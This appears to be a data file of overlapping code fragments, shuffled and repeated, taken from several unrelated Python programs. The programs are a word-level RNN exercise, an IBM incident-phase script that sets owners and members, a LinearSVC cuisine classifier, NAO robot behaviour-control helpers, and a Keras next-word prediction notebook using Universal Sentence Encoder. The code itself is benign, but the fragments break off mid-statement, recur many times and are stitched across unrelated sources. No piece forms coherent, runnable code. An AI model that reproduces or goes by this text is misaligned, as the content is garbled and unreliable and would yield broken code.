')': '||RIGHT_PAREN||', '-':", "reverse=True) int_to_vocab = {ii: word for ii, word in enumerate(sorted_vocab)} vocab_to_int = {word:", "[] # returns a trained rnn return rnn # Data params # Sequence", "of the hidden layer outputs :param dropout: dropout to add in between LSTM/GRU", "return train_loader int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess() print(token_dict) print(int_text[:10]) print(list(vocab_to_int.values())[:10]) print(list(int_to_vocab.values())[:10]) class", "word becomes the next \"current sequence\" and the cycle can continue current_seq =", "the loss over a batch and the hidden state produced by our model", "import helper import numpy as np import torch import torch.nn as nn from", "in ['\\n', '(', '\"'] else '' gen_sentences = gen_sentences.replace(' ' + token.lower(), key)", "to word values :param token_dict: Dict of puncuation tokens keys to puncuation values" ]
[ "the existing list (which would remove members)! if incident.phase_id == 'Phase_Name': incident.members =", "list of members can include multiple groups and individual users. # NOTE: #", "phase changes. # Phase is a select field with API name `phase_id`, #", "to the incident. # The list of members can include multiple groups and", "as Incident Owner. # NOTE: # When you change the owner of an", "name `phase_id`, # so the tests below are written as # if incident.phase_id", "current phase name, add members to the incident. # The list of members", "the previous owner is removed, # but also automatically added to Members so", "phase name, add members to the incident. # The list of members can", "and individual users. # NOTE: # Here we **add** the new members to", "are written as # if incident.phase_id == \"value\": # Based on the current", "# The list of members can include multiple groups and individual users. #", "2020. All Rights Reserved. # Script to set incident owner and members based", "members based on Incident Phase. # To be run when the phase changes.", "select field with API name `phase_id`, # so the tests below are written", "incident.phase_id == \"value\": # Based on the current phase name, set a single", "User as Incident Owner. # NOTE: # When you change the owner of", "set incident owner and members based on Incident Phase. # To be run", "the current phase name, set a single Group or User as Incident Owner.", "or User as Incident Owner. # NOTE: # When you change the owner", "list, # don't just overwrite the existing list (which would remove members)! if", "NOTE: # When you change the owner of an incident, the previous owner", "removed, # but also automatically added to Members so they still has access", "to Members so they still has access to the incident. if incident.phase_id ==", "overwrite the existing list (which would remove members)! if incident.phase_id == 'Phase_Name': incident.members", "access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id", "Phase': incident.owner_id = \"<EMAIL>\" # Based on the current phase name, add members", "Reserved. # Script to set incident owner and members based on Incident Phase.", "on the current phase name, set a single Group or User as Incident", "Incident Owner. # NOTE: # When you change the owner of an incident,", "members to the existing list, # don't just overwrite the existing list (which", "\"<EMAIL>\" # Based on the current phase name, add members to the incident.", "the existing list, # don't just overwrite the existing list (which would remove", "Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the current phase name, add", "run when the phase changes. # Phase is a select field with API", "as # if incident.phase_id == \"value\": # Based on the current phase name,", "you change the owner of an incident, the previous owner is removed, #", "the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some", "# NOTE: # When you change the owner of an incident, the previous", "Rights Reserved. # Script to set incident owner and members based on Incident", "incident.owner_id = \"<EMAIL>\" # Based on the current phase name, add members to", "the new members to the existing list, # don't just overwrite the existing", "on the current phase name, add members to the incident. # The list", "when the phase changes. # Phase is a select field with API name", "to the existing list, # don't just overwrite the existing list (which would", "existing list, # don't just overwrite the existing list (which would remove members)!", "remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members) + \\ [\"Group_Name\", \"<EMAIL>\"]", "# Based on the current phase name, set a single Group or User", "be run when the phase changes. # Phase is a select field with", "still has access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\"", "# but also automatically added to Members so they still has access to", "Group or User as Incident Owner. # NOTE: # When you change the", "incident owner and members based on Incident Phase. # To be run when", "IBM Corp. 2010, 2020. All Rights Reserved. # Script to set incident owner", "a single Group or User as Incident Owner. # NOTE: # When you", "# if incident.phase_id == \"value\": # Based on the current phase name, set", "# don't just overwrite the existing list (which would remove members)! if incident.phase_id", "don't just overwrite the existing list (which would remove members)! if incident.phase_id ==", "incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id", "owner and members based on Incident Phase. # To be run when the", "'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\"", "members to the incident. # The list of members can include multiple groups", "they still has access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id =", "add members to the incident. # The list of members can include multiple", "previous owner is removed, # but also automatically added to Members so they", "incident, the previous owner is removed, # but also automatically added to Members", "is a select field with API name `phase_id`, # so the tests below", "name, add members to the incident. # The list of members can include", "2010, 2020. All Rights Reserved. # Script to set incident owner and members", "would remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members) + \\ [\"Group_Name\",", "When you change the owner of an incident, the previous owner is removed,", "Copyright IBM Corp. 2010, 2020. All Rights Reserved. # Script to set incident", "# When you change the owner of an incident, the previous owner is", "can include multiple groups and individual users. # NOTE: # Here we **add**", "All Rights Reserved. # Script to set incident owner and members based on", "the owner of an incident, the previous owner is removed, # but also", "with API name `phase_id`, # so the tests below are written as #", "# To be run when the phase changes. # Phase is a select", "== \"value\": # Based on the current phase name, set a single Group", "== 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id =", "automatically added to Members so they still has access to the incident. if", "<filename>python3/incident/set-owner-and-members-by-phase.py # (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved. # Script", "is removed, # but also automatically added to Members so they still has", "owner is removed, # but also automatically added to Members so they still", "= \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based", "changes. # Phase is a select field with API name `phase_id`, # so", "'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the current phase name,", "Based on the current phase name, set a single Group or User as", "owner of an incident, the previous owner is removed, # but also automatically", "just overwrite the existing list (which would remove members)! if incident.phase_id == 'Phase_Name':", "groups and individual users. # NOTE: # Here we **add** the new members", "new members to the existing list, # don't just overwrite the existing list", "phase name, set a single Group or User as Incident Owner. # NOTE:", "of an incident, the previous owner is removed, # but also automatically added", "to set incident owner and members based on Incident Phase. # To be", "include multiple groups and individual users. # NOTE: # Here we **add** the", "the current phase name, add members to the incident. # The list of", "\"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on", "Corp. 2010, 2020. All Rights Reserved. # Script to set incident owner and", "# Script to set incident owner and members based on Incident Phase. #", "users. # NOTE: # Here we **add** the new members to the existing", "incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other", "the tests below are written as # if incident.phase_id == \"value\": # Based", "Incident Phase. # To be run when the phase changes. # Phase is", "on Incident Phase. # To be run when the phase changes. # Phase", "if incident.phase_id == \"value\": # Based on the current phase name, set a", "the incident. # The list of members can include multiple groups and individual", "below are written as # if incident.phase_id == \"value\": # Based on the", "# Here we **add** the new members to the existing list, # don't", "Here we **add** the new members to the existing list, # don't just", "list (which would remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members) +", "API name `phase_id`, # so the tests below are written as # if", "elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the", "single Group or User as Incident Owner. # NOTE: # When you change", "Script to set incident owner and members based on Incident Phase. # To", "Based on the current phase name, add members to the incident. # The", "The list of members can include multiple groups and individual users. # NOTE:", "= \"<EMAIL>\" # Based on the current phase name, add members to the", "Phase. # To be run when the phase changes. # Phase is a", "set a single Group or User as Incident Owner. # NOTE: # When", "based on Incident Phase. # To be run when the phase changes. #", "an incident, the previous owner is removed, # but also automatically added to", "multiple groups and individual users. # NOTE: # Here we **add** the new", "we **add** the new members to the existing list, # don't just overwrite", "incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" #", "current phase name, set a single Group or User as Incident Owner. #", "a select field with API name `phase_id`, # so the tests below are", "`phase_id`, # so the tests below are written as # if incident.phase_id ==", "to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id ==", "== 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the current phase", "# (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved. # Script to", "# NOTE: # Here we **add** the new members to the existing list,", "NOTE: # Here we **add** the new members to the existing list, #", "incident. # The list of members can include multiple groups and individual users.", "individual users. # NOTE: # Here we **add** the new members to the", "tests below are written as # if incident.phase_id == \"value\": # Based on", "name, set a single Group or User as Incident Owner. # NOTE: #", "but also automatically added to Members so they still has access to the", "the phase changes. # Phase is a select field with API name `phase_id`,", "and members based on Incident Phase. # To be run when the phase", "# Based on the current phase name, add members to the incident. #", "also automatically added to Members so they still has access to the incident.", "of members can include multiple groups and individual users. # NOTE: # Here", "field with API name `phase_id`, # so the tests below are written as", "Owner. # NOTE: # When you change the owner of an incident, the", "To be run when the phase changes. # Phase is a select field", "members can include multiple groups and individual users. # NOTE: # Here we", "has access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif", "(which would remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members) + \\", "\"value\": # Based on the current phase name, set a single Group or", "existing list (which would remove members)! if incident.phase_id == 'Phase_Name': incident.members = list(incident.members)", "so the tests below are written as # if incident.phase_id == \"value\": #", "so they still has access to the incident. if incident.phase_id == 'Post-Incident': incident.owner_id", "incident.phase_id == 'Some Other Phase': incident.owner_id = \"<EMAIL>\" # Based on the current", "written as # if incident.phase_id == \"value\": # Based on the current phase", "Members so they still has access to the incident. if incident.phase_id == 'Post-Incident':", "if incident.phase_id == 'Post-Incident': incident.owner_id = \"Group_Name\" elif incident.phase_id == 'Some Other Phase':", "(c) Copyright IBM Corp. 2010, 2020. All Rights Reserved. # Script to set", "# Phase is a select field with API name `phase_id`, # so the", "change the owner of an incident, the previous owner is removed, # but", "# so the tests below are written as # if incident.phase_id == \"value\":", "Phase is a select field with API name `phase_id`, # so the tests", "**add** the new members to the existing list, # don't just overwrite the", "added to Members so they still has access to the incident. if incident.phase_id" ]
[ "not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit", "class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc =", "as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False", "matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients,", "= SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients):", "from classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as", "def learn(self, ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit: matrix, classes", "self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit =", "SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc", "matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False)", "= self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output = self._svc.predict(self._matrix_database.make_row_from_recipe(ingredients)) return output[0]", "dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit: matrix,", "= matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self,", "import MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase):", "classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier from", "accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase", "self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine):", "classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes)", "learn(self, ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit: matrix, classes =", "return def classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc =", "def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5,", "= self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output =", "classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output", "linearsvclassifier.py Builds a linear support vector classifier ~78 pct accuracy, 0m10.881s execution time", "False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def", "= False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return", "from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def", "SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients): if", "ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting", "matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self,", "time \"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import", "vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier", "self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def", "from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database =", "__init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000,", "import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit", "self._svc = SVC(C=0.6, tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self,", "max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit:", "ingredients, cuisine): return def classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix()", "def classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix,", "support vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier import", "linear support vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier", "execution time \"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm", "tol=1e-5, max_iter=10000, dual=False) def learn(self, ingredients, cuisine): return def classify(self, ingredients): if not", "~78 pct accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier from matrixdatabase", "<gh_stars>0 \"\"\" linearsvclassifier.py Builds a linear support vector classifier ~78 pct accuracy, 0m10.881s", "pct accuracy, 0m10.881s execution time \"\"\" from classifier import Classifier from matrixdatabase import", "\"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC", "Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier):", "sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase", "LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit = False self._svc = SVC(C=0.6,", "a linear support vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\" from", "if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...')", "MatrixDatabase from sklearn.svm import LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database", "matrix, classes = self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True", "LinearSVC as SVC class LinearSVClassifier(Classifier): def __init__(self, matrixdatabase): self._matrix_database = matrixdatabase self._has_fit =", "self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output = self._svc.predict(self._matrix_database.make_row_from_recipe(ingredients)) return", "Builds a linear support vector classifier ~78 pct accuracy, 0m10.881s execution time \"\"\"", "cuisine): return def classify(self, ingredients): if not self._has_fit: matrix, classes = self._matrix_database.make_train_matrix() self._svc", "self._matrix_database.make_train_matrix() self._svc = self._svc.fit(matrix, classes) print('Fitting complete...') self._has_fit = True output = self._svc.predict(self._matrix_database.make_row_from_recipe(ingredients))", "classifier import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC", "\"\"\" linearsvclassifier.py Builds a linear support vector classifier ~78 pct accuracy, 0m10.881s execution", "0m10.881s execution time \"\"\" from classifier import Classifier from matrixdatabase import MatrixDatabase from", "import Classifier from matrixdatabase import MatrixDatabase from sklearn.svm import LinearSVC as SVC class" ]
[ "def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest()", "BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) )", ") def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name):", "BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\",", "BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass", "service_utils as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest", "try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown():", "su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name)", "BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl,", "import service_utils as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo,", "wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest() ).behaviors:", "try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in", "\"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name):", "BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try:", "from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service(", "from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def", "import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service(", "\"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except:", "import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl,", "BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name)", "def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass", "not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest() ).behaviors: return else:", "stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service(", "def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name)", "while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest() ).behaviors: return", ") def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except:", "pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not", "su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def", "import rospy import service_utils as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv", "rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo, BehaviorManagerInfoRequest() ).behaviors: return else: rospy.sleep(.01)", "except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\",", "stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try:", "rospy import service_utils as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import", "BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name)", "def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while", "start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if", "su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name):", "start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/stop_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) )", "as su from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def", "nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\",", "except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name", "pass def wait_for_behaviour(name): while not rospy.is_shutdown(): if name not in su.call_service( \"/naoqi_driver/behaviour_manager/get_running_behaviors\", BehaviorManagerInfo,", "BehaviorManagerControlRequest(name=name) ) def toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def", "nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest def start_behaviour(name): su.call_service( \"/naoqi_driver/behaviour_manager/start_behaviour\", BehaviorManagerControl, BehaviorManagerControlRequest(name=name) ) def stop_behaviour(name):", "toggle_behaviour(name): try: start_behaviour(name) except: pass try: stop_behaviour(name) except: pass def wait_for_behaviour(name): while not" ]
[ "np.argmax(prediction[-1]) item += ' ' + vocabulary[idx] print(text + ' --> ' +", "# print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the", "X = [] y = [] for c in lines: xxxx = c.replace('\\n','').split('", "learning and Machine learning _common terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary)", "for strings, texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: #", "Download data from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url =", "# len(vocabulary) # Splitting data into Train sets and test sets X =", "version 4) # This will take a while but won't be long :)", "# Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary) model.save('./NWP-USE') ## END OF NOTEBOOK", "lower case # PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines) # Generate an", "# print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal Sentence Encoder's TF Hub module", "# len(lines) # Generate an list of single/independent words vocabulary = list(set(' '.join(lines).replace('\\n','').split('", "enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) #", "K from keras.layers.recurrent import LSTM from keras.layers import Dense, Activation from keras.callbacks import", "all predicted words will be based on Deep learning and Machine learning _common", "# **Google drive for local storage** _NB: All comments are written to facilitate", "model, that the **Current User** may be less fatigued and see beauty in", "collection of words text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a']", "will take a while but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate", "model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the model. model.fit(X_train,", "+ item.split(' ')[-1] + '\\n') # Tests - please feel free to explore", "= ['deep convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the", "# print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\"", "module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier - Function for", "**Google drive for local storage** _NB: All comments are written to facilitate smooth", "utf-8 -*- \"\"\"Next-Word Prediction using Universal Sentence Encoder.ipynb Automatically generated by Colaboratory. Original", "numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) #", "next_word(single_text) # Testing on a collection of words text_collection = ['deep convolutional', 'simple", "Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy)", "primary_store = {} for strings, texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW", "X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10])", "= X_test.numpy() # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) #", "User** may be less fatigued and see beauty in the good work._ Uncomment", "magic to ensure Python compatibility. # This cell will prompt an external url", "= \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier - Function for embedding", "validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to predict and show", "terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary) model.save('./NWP-USE') ## END", "random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10])", "so all predicted words will be based on Deep 